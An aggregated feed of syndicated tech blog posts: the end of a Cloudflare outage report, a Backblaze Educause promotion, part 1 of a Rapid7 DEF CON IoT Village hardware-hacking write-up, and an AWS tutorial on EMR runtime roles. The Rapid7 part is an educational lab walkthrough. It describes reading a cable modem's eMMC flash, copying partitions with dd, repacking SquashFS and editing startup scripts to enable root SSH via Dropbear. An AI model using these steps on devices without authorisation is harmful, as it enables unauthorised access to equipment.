A four-hour near-complete Internet outage took place in Chad on August 12, occurring between 1045 and 1500 local time (0945 to 1400 UTC). Authorities in Chad said that the disruption was due to a “technical problem” on connections between Sudachad and networks in Cameroon and Sudan.


Unknown

In many cases, observed Internet disruptions are attributed to underlying causes thanks to statements by service providers, government officials, or media coverage of an associated event. However, for some disruptions, no published explanation or associated event could be found.

On August 11, a multi-hour outage impacted customers of US telecommunications provider CenturyLink in states including Colorado, Iowa, Missouri, Montana, New Mexico, Utah, and Wyoming, as shown in the figure below. The outage was also visible in a traffic graph for AS209, the associated autonomous system.


On August 30, a satellite Internet provider suffered a global service disruption lasting from 0630-1030 UTC, as seen in the figure below.


Conclusion

As part of Cloudflare’s Birthday Week at the end of September, we launched the Cloudflare Radar Outage Center (CROC). The CROC is a section of our new Radar 2.0 site that archives information about observed Internet disruptions. The underlying data that powers the CROC is also available through an API, enabling interested parties to incorporate data into their own tools, sites, and applications. For regular updates on Internet disruptions as they occur and other Internet trends, follow @CloudflareRadar on Twitter.

Backblaze at Educause ’22: Fueling Innovation in Higher Education

Post Syndicated from Jennifer Newman original https://www.backblaze.com/blog/backblaze-at-educause-22-fueling-innovation-in-higher-education/


Like many industries, higher education has spent the last decade discovering the transformative power of the cloud and moving into the next century. The cost savings of running a more efficient tech stack and easier access to the vital data it contains have allowed those institutions to pursue the practical and academic discoveries they were built for.

Graduating to Cloud Storage

Across the board, colleges and universities are pushing the boundaries of what cloud storage can do—and their creativity is paying huge dividends for their efficiency and security. We’ve included a few examples below that show just how these institutions have been able to maximize their cloud storage capabilities to reduce costs, modernize outdated operations, protect sensitive student and research data, and extend their ability to provide knowledge to a wider audience.

Citing Our Work

Pittsburg State: Located in Kansas, this university found themselves with nearly five decades of data in harm’s way due to the constant threat of tornadoes. Adding off-premises storage with Backblaze B2 not only gave them the geographical separation they needed, but the addition of a virtual air gap through Object Lock quadrupled their protection against ransomware.

Coast Community College District: CCCD was aiming to update its data management system and eliminate costly delays from tape backups. Their existing tapes needed to be physically chauffeured between the three colleges in the district—Coastline Community College, Golden West College, and Orange Coast College—in friendly L.A. traffic. Backblaze B2’s S3 Compatible APIs made for a seamless integration with Cohesity backup.

UCSC–Silicon Valley: A 22-person video production team at the university’s online learning program, UC Scout, had quickly reached their storage capacity after archiving thousands of videos. By leveraging Backblaze B2, their IT team was able to streamline the entire production process, saving money and unleashing the team’s full creative potential.

Kanopy: The “Netflix for libraries” overhauled its tech stack in order to share its massive selection of more than 25,000 videos with thousands of schools and public libraries. After migrating to Backblaze B2, Kanopy was able to scale efficiently and rapidly accelerate content onboarding.

Gladstone Institutes: Gladstone Institutes needed an affordable, reliable backup system that would allow their researchers to focus on the life-saving developments they were pursuing in the lab. Cloud storage’s increased reliability allowed them to move away from LTO, and off-premises storage shielded their findings from potential natural disasters.

Office Hours—No Lectures

If you’re planning to attend EduCause ’22, you can learn more about the many possibilities Backblaze opens up in higher education. Through a new partnership between Backblaze and Carahsoft, public sector customers can now leverage their existing state, local, and federal buying programs to access Backblaze B2 Cloud Storage.

In addition to a live demo of Instant Recovery in the Veeam booth, we’re proud to sponsor the Carahsoft Happy Hour Reception. With special cocktails you won’t find anywhere else (try the “Backblaze Special;” you’ll love it), this is a great opportunity to network with fellow educators and learn more about how Backblaze can help you leverage your tech stack.

The post Backblaze at Educause ’22: Fueling Innovation in Higher Education appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1

Post Syndicated from Deral Heiland original https://blog.rapid7.com/2022/10/18/hands-on-iot-hacking-rapid7-at-def-con-30-iot-village-part-1/


Rapid7 was back this year at DEF CON 30, participating in the IoT Village with another hands-on hardware hacking exercise, with the goal of teaching attendees various concepts and methods for IoT hacking. Over the years, these exercises have covered several different embedded device topics, including how to use a logic analyzer, extracting firmware, and gaining root access to an embedded IoT device.

Like last year, we had many IoT Village attendees request a copy of our exercise manual, so again I decided to create an in-depth write-up about the exercise we ran, with some expanded context to answer several questions and expand on the discussion we had with attendees at this year’s DEF CON IoT Village.

This year’s exercise focused on the following key areas:

  • Interacting with eMMC in circuit
  • Using the Linux dd command to make a binary copy of flash memory
  • Using the unsquashfs and mksquashfs commands to unpack and repack read-only SquashFS file systems
  • Altering startup files within the embedded Linux operating system to execute code during device startup
  • Leveraging Dropbear to enable SSH access

Summary of exercise

The goal of this year’s hands-on hardware hacking exercise was to gain root access to an Arris SB6190 cable modem without needing to install any external code. To do this, the user interacted with the device via a PHISON PS8211-0 embedded multimedia controller (eMMC) to mount and gain access to the NAND flash memory storage. With NAND flash memory access, the user was able to identify the partitions of interest and extract those partitions using the Linux dd command.

Next, the user extracted the filesystem from the partition binary files and modified key elements to enable SSH access over the Ethernet connection. After the modifications were completed, the filesystems were repacked and written back to the modem. Finally, the attendee was able to power up the device and log in over Ethernet using SSH with root access and the default device password.
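For readers who want a preview of what those steps look like in practice, the rough sketch below shows the general shape of that workflow using standard Linux tooling. The device path, partition number, and file names are illustrative placeholders, not the exact values from the exercise; the actual steps are covered in detail in the later parts of this series.

# Identify the block device and partitions exposed by the SD Card reader (device name will vary)
lsblk

# Make a binary copy of the partition of interest with dd (partition number is illustrative)
sudo dd if=/dev/sdb7 of=partition7.bin bs=1M

# Unpack the read-only SquashFS filesystem so its files can be modified
unsquashfs -d partition7_root partition7.bin

# ...edit the startup scripts under partition7_root to launch dropbear for SSH access...

# Repack the modified filesystem and write it back to the same partition
mksquashfs partition7_root partition7_new.bin -noappend
sudo dd if=partition7_new.bin of=/dev/sdb7 bs=1M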


eMMC access to flash memory

In this first section of the exercise, we focused on understanding the process of gaining access to the NAND flash memory by interacting with a PHISON PS8211-0 embedded multimedia controller (eMMC).

Wiring up eMMC and SD card breakout board

To interact with a typical eMMC device, we need the following connections:

  • CMD Command
  • DAT Data
  • CLK Clock
  • VCC Voltage 3.3v
  • VCCq Controller Voltage 1.8v – 3.3v
  • GND Ground

As shown in the above bullets, there are typically two different voltages required to interact with eMMC chips. However, in this case, we determined that the PHISON PS8211-0 eMMC chip did not have a different controller voltage for VCCq, meaning that the voltage used was only 3.3v for this example.

When connecting to and interacting with an eMMC device, we can usually utilize the internal power supply of the device. This often works well when different VCC and VCCq voltages are required, but in those cases, we also have to hold the microcontroller unit (MCU) in a reset state to prevent the processor from causing interruptions when trying to read memory. In this example, we found that the PHISON eMMC chip and NAND memory could be powered by supplying the voltage externally via the SD Card reader.

When using an SD Card reader to supply voltage, we must avoid hooking up the device’s normal source of power at the same time. Connecting both sources – normal power and the SD Card reader – will lead to permanent damage to the device.

When it came to soldering the needed wiring for this exercise, we realized that having attendees solder the connections themselves would be more complex than we could support. So, all the wiring was presoldered before the IoT Village event using 30-gauge, color-coded wirewrap wire. This wiring was then attached to an SD Card breakout board, as shown below in Figure 1:

  • White = Data
  • Blue = Clock
  • Yellow = Command
  • Red = Voltage (VCC)
  • Black = Ground

Figure 1: Wiring Hookups

Also, as you can see in the above images, the wires do not run parallel to each other; they keep a reasonable gap and cross perpendicularly where they pass over each other. We found during testing that running wires directly alongside each other caused the partitions to fail to mount properly, most likely because noise induced from the neighboring lines affected the signal.

Note: If you are looking to do your own wiring, the 30-gauge wirewrap wire I used is polyvinylidene fluoride-insulated wire sold under the brand name Kynar. The benefit of using Kynar wirewrap is that this insulation does not melt or shrink as easily from the heat of a soldering iron. When heated by a soldering iron, standard plastic insulation will shrink back, exposing uninsulated wire, which can lead to wires shorting out on the circuit board.

Connect SD card reader

With the modem wired up to the SD Card breakout board as shown above, we can mount the NAND flash memory by connecting an SD Card reader. Note that not all SD Card readers will work; I used trial and error with several SD Card readers I had in my possession until I found that an inexpensive DYNEX brand reader worked. It should be attached as shown below in Figure 2:

Figure 2: Connected SD Card Reader

Once plugged in, the various partitions on the cable modem's NAND flash memory should start loading; in this case, a total of seven partitions mounted. This can take a few minutes to complete. If your system opens a window for each volume as it mounts, I recommend closing them to avoid cluttering your desktop. To see the layout of the various partitions on the NAND flash and gather the information needed for reading and writing to the correct partitions, we used the Linux application Disks. Once Disks is open, click on the 118 MB drive in the left column; it will show all of the partitions and should look something like Figure 3 below:

Figure 3: Disks NAND Flash Partitions
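
If you prefer the command line to the Disks application, the same partition layout can typically be confirmed with standard Linux block-device tools. This is just a quick check; the /dev/sdb device name is an assumption and will differ depending on how the reader enumerates on your system.

# List the device and its partitions with size, filesystem type, and label
lsblk -o NAME,SIZE,FSTYPE,LABEL /dev/sdb

# Alternatively, print the partition table
sudo fdisk -l /dev/sdb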

In our second installment of this 4-part blog series, we’ll discuss the step of extracting partition data. Check back with us next week!

Introducing runtime roles for Amazon EMR steps: Use IAM roles and AWS Lake Formation for access control with Amazon EMR

Post Syndicated from Stefano Sandona original https://aws.amazon.com/blogs/big-data/introducing-runtime-roles-for-amazon-emr-steps-use-iam-roles-and-aws-lake-formation-for-access-control-with-amazon-emr/

You can use the Amazon EMR Steps API to submit Apache Hive, Apache Spark, and other types of applications to an EMR cluster. You can invoke the Steps API using Apache Airflow, AWS Step Functions, the AWS Command Line Interface (AWS CLI), all the AWS SDKs, and the AWS Management Console. Jobs submitted with the Steps API use the Amazon Elastic Compute Cloud (Amazon EC2) instance profile to access AWS resources such as Amazon Simple Storage Service (Amazon S3) buckets, AWS Glue tables, and Amazon DynamoDB tables from the cluster.

Previously, if a step needed access to a specific S3 bucket and another step needed access to a specific DynamoDB table, the AWS Identity and Access Management (IAM) policy attached to the instance profile had to allow access to both the S3 bucket and the DynamoDB table. This meant that the IAM policies you assigned to the instance profile had to contain a union of all the permissions for every step that ran on an EMR cluster.

We’re happy to introduce runtime roles for EMR steps. A runtime role is an IAM role that you associate with an EMR step, and jobs use this role to access AWS resources. With runtime roles for EMR steps, you can now specify different IAM roles for the Spark and the Hive jobs, thereby scoping down access at a job level. This allows you to simplify access controls on a single EMR cluster that is shared between multiple tenants, wherein each tenant can be easily isolated using IAM roles.

The ability to specify an IAM role with a job is also available on Amazon EMR on EKS and Amazon EMR Serverless. You can also use AWS Lake Formation to apply table- and column-level permissions for Apache Hive and Apache Spark jobs that are submitted with EMR steps. For more information, refer to Configure runtime roles for Amazon EMR steps.

In this post, we dive deeper into runtime roles for EMR steps, helping you understand how the various pieces work together, and how each step is isolated on an EMR cluster.

Solution overview

In this post, we walk through the following:

  1. Create an EMR cluster enabled to use the new role-based access control with EMR steps.
  2. Create two IAM roles with different permissions in terms of the Amazon S3 data and Lake Formation tables they can access.
  3. Allow the IAM principal submitting the EMR steps to use these two IAM roles.
  4. See how EMR steps running with the same code and trying to access the same data have different permissions based on the runtime role specified at submission time.
  5. See how to monitor and control actions using source identity propagation.

Set up EMR cluster security configuration

Amazon EMR security configurations simplify applying consistent security, authorization, and authentication options across your clusters. You can create a security configuration on the Amazon EMR console or via the AWS CLI or AWS SDK. When you attach a security configuration to a cluster, Amazon EMR applies the settings in the security configuration to the cluster. You can attach a security configuration to multiple clusters at creation time, but you can't apply one to a running cluster.

To enable runtime roles for EMR steps, we have to create a security configuration as shown in the following code and enable the runtime roles property (configured via EnableApplicationScopedIAMRole). In addition to the runtime roles, we’re enabling propagation of the source identity (configured via PropagateSourceIdentity) and support for Lake Formation (configured via LakeFormationConfiguration). The source identity is a mechanism to monitor and control actions taken with assumed roles. Enabling Propagate source identity allows you to audit actions performed using the runtime role. Lake Formation is an AWS service to securely manage a data lake, which includes defining and enforcing central access control policies for your data lake.

Create a file called step-runtime-roles-sec-cfg.json with the following content:

{
    "AuthorizationConfiguration": {
        "IAMConfiguration": {
            "EnableApplicationScopedIAMRole": true,
            "ApplicationScopedIAMRoleConfiguration": 
                {
                    "PropagateSourceIdentity": true
                }
        },
        "LakeFormationConfiguration": {
            "AuthorizedSessionTagValue": "Amazon EMR"
        }
    }
}

Create the Amazon EMR security configuration:

aws emr create-security-configuration \
--name 'iamconfig-with-iam-lf' \
--security-configuration file://step-runtime-roles-sec-cfg.json

You can also do the same via the Amazon EMR console:

  1. On the Amazon EMR console, choose Security configurations in the navigation pane.
  2. Choose Create.
  3. For Security configuration name, enter a name.
  4. For Security configuration setup options, select Choose custom settings.
  5. For IAM role for applications, select Runtime role.
  6. Select Propagate source identity to audit actions performed using the runtime role.
  7. For Fine-grained access control, select AWS Lake Formation.
  8. Complete the security configuration.

The security configuration appears in your security configuration list. You can also see that the authorization mechanism listed here is the runtime role instead of the instance profile.
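
You can also verify the security configuration from the AWS CLI (a quick read-only check, assuming the configuration name used earlier in this post):

# Print the JSON body of the security configuration we created
aws emr describe-security-configuration \
--name 'iamconfig-with-iam-lf'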

Launch the cluster

Now we launch an EMR cluster and specify the security configuration we created. For more information, refer to Specify a security configuration for a cluster.

The following code provides the AWS CLI command for launching an EMR cluster with the appropriate security configuration. Note that this cluster is launched on the default VPC and public subnet with the default IAM roles. In addition, the cluster is launched with one primary and one core instance of the specified instance type. For more details on how to customize the launch parameters, refer to create-cluster.

If the default EMR roles EMR_EC2_DefaultRole and EMR_DefaultRole don’t exist in IAM in your account (this is the first time you’re launching an EMR cluster with those), before launching the cluster, use the following command to create them:

aws emr create-default-roles

Create the cluster with the following code:

#Change with your Key Pair
KEYPAIR=<MY_KEYPAIR>
INSTANCE_TYPE="r4.4xlarge"
#Change with your Security Configuration Name
SECURITY_CONFIG="iamconfig-with-iam-lf"
#Change with your S3 log URI
LOG_URI="s3://mybucket/logs/"

aws emr create-cluster \
--name "iam-passthrough-cluster" \
--release-label emr-6.7.0 \
--use-default-roles \
--security-configuration $SECURITY_CONFIG \
--ec2-attributes KeyName=$KEYPAIR \
--instance-groups InstanceGroupType=MASTER,InstanceCount=1,InstanceType=$INSTANCE_TYPE  InstanceGroupType=CORE,InstanceCount=1,InstanceType=$INSTANCE_TYPE \
--applications Name=Spark Name=Hadoop Name=Hive \
--log-uri $LOG_URI

When the cluster is fully provisioned (Waiting state), let’s try to run a step on it with runtime roles for EMR steps enabled:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Example",
            "Args": [
              "spark-submit",
              "--class",
              "org.apache.spark.examples.SparkPi",
              "/usr/lib/spark/examples/jars/spark-examples.jar",
              "5"
            ]
        }]'

After launching the command, we receive the following as output:

An error occurred (ValidationException) when calling the AddJobFlowSteps operation: Runtime roles are required for this cluster. Please specify the role using the ExecutionRoleArn parameter.

The step submission failed, asking us to provide a runtime role. In the next section, we set up two IAM roles with different permissions and use them as the runtime roles for EMR steps.

Set up IAM roles as runtime roles

Any IAM role that you want to use as a runtime role for EMR steps must have a trust policy that allows the EMR cluster’s EC2 instance profile to assume it. In our setup, we’re using the default IAM role EMR_EC2_DefaultRole as the instance profile role. In addition, we create two IAM roles called test-emr-demo1 and test-emr-demo2 that we use as runtime roles for EMR steps.

The following code is the trust policy for both of the IAM roles, which lets the EMR cluster’s EC2 instance profile role, EMR_EC2_DefaultRole, assume these roles and set the source identity and LakeFormationAuthorizedCaller tag on the role sessions. The TagSession permission is needed so that Amazon EMR can authorize to Lake Formation. The SetSourceIdentity statement is needed for the propagate source identity feature.

Create a file called trust-policy.json with the following content (replace 123456789012 with your AWS account ID):

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/EMR_EC2_DefaultRole"
            },
            "Action": "sts:AssumeRole"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/EMR_EC2_DefaultRole"
            },
            "Action": "sts:SetSourceIdentity"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/EMR_EC2_DefaultRole"
            },
            "Action": "sts:TagSession",
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/LakeFormationAuthorizedCaller": "Amazon EMR"
                }
            }
        }
    ]
}

Use that policy to create the two IAM roles, test-emr-demo1 and test-emr-demo2:

aws iam create-role \
--role-name test-emr-demo1 \
--assume-role-policy-document file://trust-policy.json

aws iam create-role \
--role-name test-emr-demo2 \
--assume-role-policy-document file://trust-policy.json

Set up permissions for the principal submitting the EMR steps with runtime roles

The IAM principal submitting the EMR steps needs to have permissions to invoke the AddJobFlowSteps API. In addition, you can use the Condition key elasticmapreduce:ExecutionRoleArn to control access to specific IAM roles. For example, the following policy allows the IAM principal to only use IAM roles test-emr-demo1 and test-emr-demo2 as the runtime roles for EMR steps.

  1. Create the job-submitter-policy.json file with the following content (replace 123456789012 with your AWS account ID):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "AddStepsWithSpecificExecRoleArn",
                "Effect": "Allow",
                "Action": [
                    "elasticmapreduce:AddJobFlowSteps"
                ],
                "Resource": "*",
                "Condition": {
                    "StringEquals": {
                        "elasticmapreduce:ExecutionRoleArn": [
                            "arn:aws:iam::123456789012:role/test-emr-demo1",
                            "arn:aws:iam::123456789012:role/test-emr-demo2"
                        ]
                    }
                }
            },
            {
                "Sid": "EMRDescribeCluster",
                "Effect": "Allow",
                "Action": [
                    "elasticmapreduce:DescribeCluster"
                ],
                "Resource": "*"
            }
        ]
    }

  2. Create the IAM policy with the following code:
    aws iam create-policy \
    --policy-name emr-runtime-roles-submitter-policy \
    --policy-document file://job-submitter-policy.json

  3. Assign this policy to the IAM principal (IAM user or IAM role) you’re going to use to submit the EMR steps (replace 123456789012 with your AWS account ID and replace john with the IAM user you use to submit your EMR steps):
    aws iam attach-user-policy \
    --user-name john \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-submitter-policy"

IAM user john can now submit steps using arn:aws:iam::123456789012:role/test-emr-demo1 and arn:aws:iam::123456789012:role/test-emr-demo2 as the step runtime roles.

Use runtime roles with EMR steps

We now prepare our setup to show runtime roles for EMR steps in action.

Set up Amazon S3

To prepare your Amazon S3 data, complete the following steps:

  1. Create a CSV file called test.csv with the following content:
    1,a,1a
    2,b,2b

  2. Upload the file to Amazon S3 in three different locations:
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    
    aws s3 cp test.csv s3://${BUCKET_NAME}/demo1/
    aws s3 cp test.csv s3://${BUCKET_NAME}/demo2/
    aws s3 cp test.csv s3://${BUCKET_NAME}/nondemo/

    For our initial test, we use a PySpark application called test.py with the following contents:

    from pyspark.sql import SparkSession
    spark = SparkSession.builder.appName("my app").enableHiveSupport().getOrCreate()
    
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    
    try:
      spark.read.csv("s3://" + BUCKET_NAME + "/demo1/test.csv").show()
      print("Accessed demo1")
    except:
      print("Could not access demo1")
    
    try:
      spark.read.csv("s3://" + BUCKET_NAME + "/demo2/test.csv").show()
      print("Accessed demo2")
    except:
      print("Could not access demo2")
    
    try:
      spark.read.csv("s3://" + BUCKET_NAME + "/nondemo/test.csv").show()
      print("Accessed nondemo")
    except:
      print("Could not access nondemo")
    spark.stop()

    In the script, we’re trying to access the CSV file present under three different prefixes in the test bucket.

  3. Upload the Spark application inside the same S3 bucket where we placed the test.csv file but in a different location:
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    aws s3 cp test.py s3://${BUCKET_NAME}/scripts/

Set up runtime role permissions

To show how runtime roles for EMR steps work, we assign different IAM permissions for Amazon S3 access to the roles we created. The following table summarizes the grants we provide to each role (emr-steps-roles-new-us-east-1 is the bucket you configured in the previous section).

S3 locations \ IAM Roles                        test-emr-demo1   test-emr-demo2
s3://emr-steps-roles-new-us-east-1/*            No Access        No Access
s3://emr-steps-roles-new-us-east-1/demo1/*      Full Access      No Access
s3://emr-steps-roles-new-us-east-1/demo2/*      No Access        Full Access
s3://emr-steps-roles-new-us-east-1/scripts/*    Read Access      Read Access

  1. Create the file demo1-policy.json with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo1",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo1/*"
                ]                    
            },
            {
                "Effect": "Allow",
                "Action": [
                    "s3:Get*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts/*"
                ]                    
            }
        ]
    }

  2. Create the file demo2-policy.json with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo2",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo2/*"
                ]                    
            },
            {
                "Effect": "Allow",
                "Action": [
                    "s3:Get*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts/*"
                ]                    
            }
        ]
    }

  3. Create our IAM policies:
    aws iam create-policy \
    --policy-name test-emr-demo1-policy \
    --policy-document file://demo1-policy.json
    
    aws iam create-policy \
    --policy-name test-emr-demo2-policy \
    --policy-document file://demo2-policy.json

  4. Assign to each role the related policy (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name test-emr-demo1 \
    --policy-arn "arn:aws:iam::123456789012:policy/test-emr-demo1-policy"
    
    aws iam attach-role-policy \
    --role-name test-emr-demo2 \
    --policy-arn "arn:aws:iam::123456789012:policy/test-emr-demo2-policy"

    To use runtime roles with Amazon EMR steps, we need to add the following policy to our EMR cluster’s EC2 instance profile (in this example EMR_EC2_DefaultRole). With this policy, the underlying EC2 instances for the EMR cluster can assume the runtime role and apply a tag to that runtime role.

  5. Create the file runtime-roles-policy.json with the following content (replace 123456789012 with your AWS account ID):
    {
        "Version": "2012-10-17",
        "Statement": [{
                "Sid": "AllowRuntimeRoleUsage",
                "Effect": "Allow",
                "Action": [
                    "sts:AssumeRole",
                    "sts:TagSession",
                    "sts:SetSourceIdentity"
                ],
                "Resource": [
                    "arn:aws:iam::123456789012:role/test-emr-demo1",
                    "arn:aws:iam::123456789012:role/test-emr-demo2"
                ]
            }
        ]
    }

  6. Create the IAM policy:
    aws iam create-policy \
    --policy-name emr-runtime-roles-policy \
    --policy-document file://runtime-roles-policy.json

  7. Assign the created policy to the EMR cluster’s EC2 instance profile, in this example EMR_EC2_DefaultRole:
    aws iam attach-role-policy \
    --role-name EMR_EC2_DefaultRole \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-policy"

Test permissions with runtime roles

We’re now ready to perform our first test. We run the test.py script, previously uploaded to Amazon S3, two times as Spark steps: first using the test-emr-demo1 role and then using the test-emr-demo2 role as the runtime roles.

To run an EMR step specifying a runtime role, you need the latest version of the AWS CLI. For more details about updating the AWS CLI, refer to Installing or updating the latest version of the AWS CLI.

Let’s submit a step specifying test-emr-demo1 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo1

This command returns an EMR step ID. To check our step output logs, we can proceed two different ways:

  • From the Amazon EMR console – On the Steps tab, choose the View logs link related to the specific step ID and select stdout.
  • From Amazon S3 – While launching our cluster, we configured an S3 location for logging. We can find our step logs under $(LOG_URI)/steps/<stepID>/stdout.gz.

The logs could take a couple of minutes to populate after the step is marked as Completed.
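
You can also check the step state and retrieve the logs from the AWS CLI. The following is a sketch; the cluster ID, step ID, and log URI are placeholders that must match your environment.

#Change with your EMR cluster ID, the step ID returned by add-steps, and your S3 log URI
CLUSTER_ID=j-XXXXXXXXXXXXX
STEP_ID=s-XXXXXXXXXXXXX
LOG_URI="s3://mybucket/logs/"

# Check the step status (PENDING, RUNNING, COMPLETED, FAILED, ...)
aws emr describe-step \
--cluster-id $CLUSTER_ID \
--step-id $STEP_ID \
--query 'Step.Status.State'

# Once the step is completed, download and print its stdout log
# (adjust the prefix if your logs are nested under the cluster ID)
aws s3 cp ${LOG_URI}steps/${STEP_ID}/stdout.gz - | gunzip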

The following is the output of the EMR step with test-emr-demo1 as the runtime role:

+---+---+---+
|_c0|_c1|_c2|
+---+---+---+
|  1|  a| 1a|
|  2|  b| 2b|
+---+---+---+

Accessed demo1
Could not access demo2
Could not access nondemo

As we can see, only the demo1 folder was accessible by our application.

Diving deeper into the step stderr logs, we can see that the related YARN application application_1656350436159_0017 was launched with the user 6GC64F33KUW4Q2JY6LKR7UAHWETKKXYL. We can confirm this by connecting to the EMR primary instance using SSH and using the YARN CLI:

[hadoop@ip-172-31-63-203]$ yarn application -status application_1656350436159_0017
...
Application-Id : application_1656350436159_0017
Application-Name : my app
Application-Type : SPARK
User : 6GC64F33KUW4Q2JY6LKR7UAHWETKKXYL
Queue : default
Application Priority : 0
...

Please note that in your case, the YARN application ID and the user will be different.

Now we submit the same script again as a new EMR step, but this time with the role test-emr-demo2 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo2

The following is the output of the EMR step with test-emr-demo2 as the runtime role:

Could not access demo1
+---+---+---+
|_c0|_c1|_c2|
+---+---+---+
|  1|  a| 1a|
|  2|  b| 2b|
+---+---+---+

Accessed demo2
Could not access nondemo

As we can see, only the demo2 folder was accessible by our application.

Diving deeper into the step stderr logs, we can see that the related YARN application application_1656350436159_0018 was launched with a different user 7T2ORHE6Z4Q7PHLN725C2CVWILZWYOLE. We can confirm this by using the YARN CLI:

[hadoop@ip-172-31-63-203]$ yarn application -status application_1656350436159_0018
...
Application-Id : application_1656350436159_0018
Application-Name : my app
Application-Type : SPARK
User : 7T2ORHE6Z4Q7PHLN725C2CVWILZWYOLE
Queue : default
Application Priority : 0
...

Each step was able to only access the CSV file that was allowed by the runtime role, so the first step was able to only access s3://emr-steps-roles-new-us-east-1/demo1/test.csv and the second step was only able to access s3://emr-steps-roles-new-us-east-1/demo2/test.csv. In addition, we observed that Amazon EMR created a unique user for each step, and used that user to run the job. Please note that both roles need at least read access to the S3 location where the step scripts are located (for example, s3://emr-steps-roles-new-us-east-1/scripts/test.py).

Now that we have seen how runtime roles for EMR steps work, let’s look at how we can use Lake Formation to apply fine-grained access controls with EMR steps.

Use Lake Formation-based access control with EMR steps

You can use Lake Formation to apply table- and column-level permissions with Apache Spark and Apache Hive jobs submitted as EMR steps. First, the data lake admin in Lake Formation needs to register Amazon EMR as the AuthorizedSessionTagValue to enforce Lake Formation permissions on EMR. Lake Formation uses this session tag to authorize callers and provide access to the data lake. The Amazon EMR value is referenced inside the step-runtime-roles-sec-cfg.json file we used earlier when we created the EMR security configuration, and inside the trust-policy.json file we used to create the two runtime roles test-emr-demo1 and test-emr-demo2.

We can do so on the Lake Formation console in the External data filtering section (replace 123456789012 with your AWS account ID).

On the IAM runtime roles’ trust policy, we already have the sts:TagSession permission with the condition “aws:RequestTag/LakeFormationAuthorizedCaller": "Amazon EMR". So we’re ready to proceed.
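
You can also confirm the external data filtering configuration from the AWS CLI. This is a read-only sketch; the field names come from the Lake Formation GetDataLakeSettings API.

# Print the external data filtering settings for the data lake
aws lakeformation get-data-lake-settings \
--query 'DataLakeSettings.[AllowExternalDataFiltering,ExternalDataFilteringAllowList,AuthorizedSessionTagValueList]'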

To demonstrate how Lake Formation works with EMR steps, we create one database named entities with two tables named users and products, and we assign in Lake Formation the grants summarized in the following table.

IAM Roles \ Tables (entities DB)   users (Table)                        products (Table)
test-emr-demo1                     Full Read Access                     No Access
test-emr-demo2                     Read Access on Columns: uid, state   Full Read Access

Prepare Amazon S3 files

We first prepare our Amazon S3 files.

  1. Create the users.csv file with the following content:
    00005678,john,pike,england,london,Hidden Road 78
    00009039,paolo,rossi,italy,milan,Via degli Alberi 56A
    00009057,july,finn,germany,berlin,Green Road 90

  2. Create the products.csv file with the following content:
    P0000789,Bike2000,Sport
    P0000567,CoverToCover,Smartphone
    P0005677,Whiteboard X786,Home

  3. Upload these files to Amazon S3 in two different locations:
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    
    aws s3 cp users.csv s3://${BUCKET_NAME}/entities-database/users/
    aws s3 cp products.csv s3://${BUCKET_NAME}/entities-database/products/

Prepare the database and tables

We can create our entities database by using the AWS Glue APIs.

  1. Create the entities-db.json file with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "DatabaseInput": {
            "Name": "entities",
            "LocationUri": "s3://emr-steps-roles-new-us-east-1/entities-database/",
            "CreateTableDefaultPermissions": []
        }
    }

